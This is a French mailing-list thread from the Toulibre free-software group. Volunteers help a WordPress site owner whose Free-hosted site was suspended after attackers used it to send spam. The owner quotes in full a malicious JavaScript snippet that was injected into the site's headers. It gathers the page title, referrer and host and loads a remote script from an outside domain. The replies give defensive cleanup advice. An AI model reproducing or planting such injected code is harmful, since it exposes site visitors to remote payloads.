[Toulibre] site free suspendu

Sam 30 Jan 11:08:07 CET 2016

Le 30/01/2016 10:19, Julien Marin via Toulouse-ll a écrit :
> Salut,
>
> Pour se rencontrer physiquement, ça aurait été un plaisir de te filer un
> coup de main, main ca risque d'être compliqué, vu que je suis parti
> jusqu'à Bamako (Mali). Si tu as besoin tu peut tenter de m’appeler au 05
> 82 880 880 (c'est un numéro français tarif normal redirigé via VOIP sur
> mon ordinateur si je suis connecté au moment ou tu appelles. Si je suis
> connecté  tu pourras me joindre dessus.))
>
> Il faut faire deux choses:
>
> *1/ réactiver ton accès *
> Normalement, tu doit pouvoir faire ça depuis les pages de gestion de ton
> compte Free.
> *ATTENTION* Le problème n'est pas résolu et l'envoi de spam ouvert par
> le hacker va reprendre si tu ne refermes pas la porte qu'il a ouverte...
> Et si ça reprend free va te suspendre à nouveau.
> Une fois que tu aura récupéré ton accès FTP, je te conseille d'ajouter
> les deux lignes suivantes au début du fichier .htaccess situé à la base
> de ton hébergement:
>
> DENY FROM ALL
> ALLOW FROM 1.2.3.4
>
> (remplace 1.2.3.4) par ton adresse IP. Cela restreindra l’accès HTTP à
> ton site à ta seule adresse IP. Ca te permettra de le réparer
> tranquillement, sans risquer que le hacker ne renvoie du spam et que ton
> site soit à nouveau bloqué par Free.
>
> *2/ Nettoyer ton site*
>
> Mettre ton site à jour est une bonne chose: ça supprimera la faille de
> sécurité via laquelle le pirate est entré et à installé ses fichiers,
> mais ça ne sufira pas: il a déjà installé son système d'envoi de spam
> sur ton site.
>
> Cherche sur google "réparer wordpress hacké", tu trouvera plein de tutos
> à ce sujet. Ca te permetra de remetre ton site dans l'état où il était
> avant que tu te fasses hacker (c'est à dire, virer ce que le hacker à
> rajouté sur ton site)
>
> Une fois que tu auras fait le nécessaire (et pas avant), tu peut enlever
> les deux lignes de ton .htaccess que tu avait ajouté. (surtout le DENY
> FROM ALL) afin que tu site soit de nouveau accessible à tout le monde
> (c'est le but, hein...)
>
> Julien
>
>

Bonjour,

Les conseils de Julien sont excellents.
Cela étant la mise à niveau de ton CMS mériterait de s'effectuer en 
préalable sur ton ordinateur, localement, de préférence en n'utilisant 
aucun des fichiers sources originaux de Wordpress ou à défaut en 
plusieurs temps :
- reconstruction du site en local avec les sources et la base de données
- mise à jour automatisée interne à wordpress
- export local (phpmyadmin) de la base de données "à jour"
- deuxième reconstruction locale avec seulement les sources de la 
version la plus récente (ceci permet d'être certain qu'aucun des 
fichiers originaux ne subsistent) et de la base de données actualisée et 
donc compatible.
- adaptation des fichiers de configuration et de la base de données aux 
paramètres correspondant à ton espace d'hébergement chez free ;
- upload de la nouvelle base et des sources propres chez free

Je ne suis pas spécialiste de ce cms mais il doit sûrement exister des 
plugins-extensions de wordpress etendant les fonctionnalités de 
sécurisation contre le spam. Cela peut le cas échéant te protéger mieux 
que l'installation de base.

En espérant que tout ça te soit utile.
Bon week-end.

Philippe

>
>
> Malinux Télé
> Donner l’accès aux logiciels libres éducatifs aux enfants du Mali et
> d’ailleurs
> http://malinuxtele.tuxfamily.org
> Le 29/01/2016 15:15, Camille à barbe a écrit :
>> Salut Julien,
>> Merci de m'avoir répondu. Je ne faisais pas d'envois de mails, et j'ai
>> effectivement constaté que des fichiers apparaissaient sur mon site.
>> J'ai l'habitude d'utiliser filezilla pour uploader des fichiers et
>> contourner quelques limites imposées par wordpress. Je constate que je
>> ne peux plus me connecter en ftp à mon site. Serait-il possible qu'on
>> prenne rendez-vous pour essayer de régler ça ensemble : je me sens
>> perdu et j'ai un mode de vie particulier, un peu précaire en ce
>> moment, qui fait que je voudrais régler ça rapidement. Tu accepterais
>> qu'on se rencontre pour voir ça ensemble ?
>>
>> Le 29/01/2016 15:27, Julien Marin a écrit :
>>> Salut camille,
>>>
>>> Un envoi de spam peut signifier:
>>>
>>>   * Soit que tu as envoyé beaucoup de mail (type newsletter) depuis
>>>     le site et que des gens soient allés se plaindre à free (beaucoup
>>>     ne font la différente entre un mail militant et une pub pour du
>>>     viagra, du moment qu'il n'a pas été désiré, c'est triste mais
>>>     c'est comme ça)
>>>   * Soit que ton wordpress a du être hacké par des spammeurs qui s'en
>>>     sont servi pour envoyer du spam.
>>>
>>> Si c'est cette deuxième hypothèse, les pirates ont du profiter d'une
>>> faille wordpress (ou d'un code d'accès à l'interface d'administration
>>> facile à trouver) pour prendre la main sur ton site, y installer un
>>> module de mass-mailing, et balancer à tout va des pub diverses avant
>>> que free ne te bloque...
>>>
>>> Dans ce cas, il ne s'agit pas d'un hack à visée politique visant le
>>> site en tant que tel, mais d'une attaque automatisée cherchant dans
>>> la masse de site, lesquels présenteraient une vulnérabilité connue,
>>> afin d'en profiter pour émettre du spam.
>>>
>>> Un moyen de le vérifier si tu as été hackée, est de te promener dans
>>> le FTP de ton site, si tu voies des fichier en .php (les exécutables
>>> de ton site web) modifiés récemment, c'est que qqn a du trouver un
>>> moyen d'injecter ses propres scripts (a fins d'envoi de spam) sur ton
>>> site.
>>>
>>> Si c'est le cas, il ne faudra d'abord "nettoyer" ton installation de
>>> wordpress avant remise en ligne
>>>
>>> JUlien
>>>
>>>
>>> Malinux Télé
>>> Donner l’accès aux logiciels libres éducatifs aux enfants du Mali et
>>> d’ailleurs
>>> http://malinuxtele.tuxfamily.org
>>>
>>>
>>> Le 29/01/2016 13:34, Camille à barbe via Toulouse-ll a écrit :
>>>> Bonjour,
>>>> Je gère (comme je peux) un site internet hébergé par free, propulsé par
>>>> wordpress 3.1.4.
>>>>
>>>>
>>>> Pourquoi je voudrais le remettre en place ?
>>>> Je l'ai mis en place pour faire suite à une inculpation au sujet
>>>> d'une action
>>>> menée à Notre-Dame-des-Landes qui nous a valu deux procès avant
>>>> d'être relaxés.
>>>> Pour en savoir davantage, il reste un embryon de site que j'avais
>>>> mis en place
>>>> pour préparer le premier procès :http://kamyas1naz.free.fr/photos.htm
>>>> ainsi que la page facebook associée
>>>> :https://www.facebook.com/kamyapoil/
>>>> Je poursuis cette démarche et ce site m'est utile pour présenter les
>>>> actions
>>>> déjà menées et en préparer d'autres.
>>>>
>>>>
>>>> Pourquoi free a suspendu le compte ?
>>>> J'ai reçu ce message de la part de free le 27 janvier :
>>>>
>>>>
>>>> "Bonjour,
>>>>
>>>> Ce courrier électronique vous est adressé pour vous indiquer que
>>>> votre compte
>>>> Pages Perso kamyapoil a été suspendu pour la raison suivante :
>>>>
>>>> Votre compte envoie du Spam (mail non solicite) via la fonction php
>>>> mail()
>>>>
>>>> Pour lever la suspension, consultez les newsgroups
>>>> proxad.free.services.pagesperso pour effectuer les pré-requis
>>>> nécessaires à la
>>>> ré-activation de votre compte et postez votre demande dans le fil
>>>> qui vous sera
>>>> indiqué. ( la page d'assistance sur le site de Free vous donnera les
>>>> informations nécessaires pour accéder à ce forum -
>>>> http://www.free.fr/assistance/541.html ). Aucun support ne sera fait
>>>> par mail.
>>>>
>>>> ATTENTION : en l'absence de réaction de votre part dans les deux
>>>> mois, votre
>>>> compte Pages Perso sera DETRUIT.
>>>>
>>>>
>>>> Cordialement,
>>>> Le service Pages Perso."
>>>>
>>>> J'avais eu un signe avant coureur. A partir du mois d'octobre, des
>>>> lignes de codes ont été insérées à mon insu :
>>>>
>>>> <script>var a=''; setTimeout(10); var default_keyword =
>>>> encodeURIComponent(document.title); var se_referrer =
>>>> encodeURIComponent(document.referrer); var host =
>>>> encodeURIComponent(window.location.host); var base =
>>>> "http://megatest.vn/js/jquery.min.php"; var n_url = base +
>>>> "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer +
>>>> "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" +
>>>> encodeURIComponent(n_url); if (default_keyword !== null &&
>>>> default_keyword !== '' && se_referrer !== null && se_referrer !==
>>>> ''){document.write('<script type="text/javascript" src="' + f_url +
>>>> '">'
>>>> + '<' + '/script>');}</script>
>>>>
>>>> Elles se trouvaient dans l'en-tête des feuilles de style et avaient
>>>> pour effet de bloquer une dizaine de secondes chaque page du site
>>>> qu'on essayait de charger. Je n'y connais vraiment pas grand chose,
>>>> mais un sympathisant m'a prévenu du problème et je les ai effacées.
>>>> Mais elles revenaient à chaque fois, une à deux fois par semaine.
>>>> J'ai pris l'habitude de les retirer. J'ai modifié le nom
>>>> d'administrateur et le mot de passe, mais ça n'a pas réglé le
>>>> problème. J'ai continué à effacer ces lignes de code, une à deux
>>>> fois par semaine.
>>>> Je voulais changer les autres mots de passe (base de données, et je
>>>> ne sais quoi d'autre), et télécharger une version plus récente de
>>>> wordpress puisqu'on n'est plus limité à la version 3.1.4 depuis
>>>> quelques temps, mais je ne l'ai pas fait par peur de tout planter :
>>>> j'espérais trouver quelqu'un pour m'y aider. Free ne m'a pas laissé
>>>> davantage de temps pour résoudre le problème et le site est
>>>> maintenant suspendu. Je ne comprends pas comment faire pour accéder
>>>> à la demande de free. J'ai rencontré quelqu'un de tetraneutral qui
>>>> m'a suggéré de me tourner vers vous. Pouvez vous m'aider ?
>>>>
>>>> Merci.
>>>>
>>>> _______________________________________________
>>>> Toulouse-ll mailing list
>>>> Toulouse-ll at toulibre.org
>>>> http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll
>>>
>>
>
>
>
> _______________________________________________
> Toulouse-ll mailing list
> Toulouse-ll at toulibre.org
> http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll
>

-- 
Avec EDF SA, mon argent va au nucléaire et à l'État actionnaire. Avec 
Enercoop, c'est la même électricité, mon argent va au privé et ça me 
coûte plus cher.
Dans un cas comme dans l'autre, je prendrais des doses croissantes de 
radioactivité, les mutations génétiques vont se démultiplier, si je ne 
bouge pas vite mon cul pour arrêter le nucléaire.
La première alternative au nucléaire c'est = pas de nucléaire.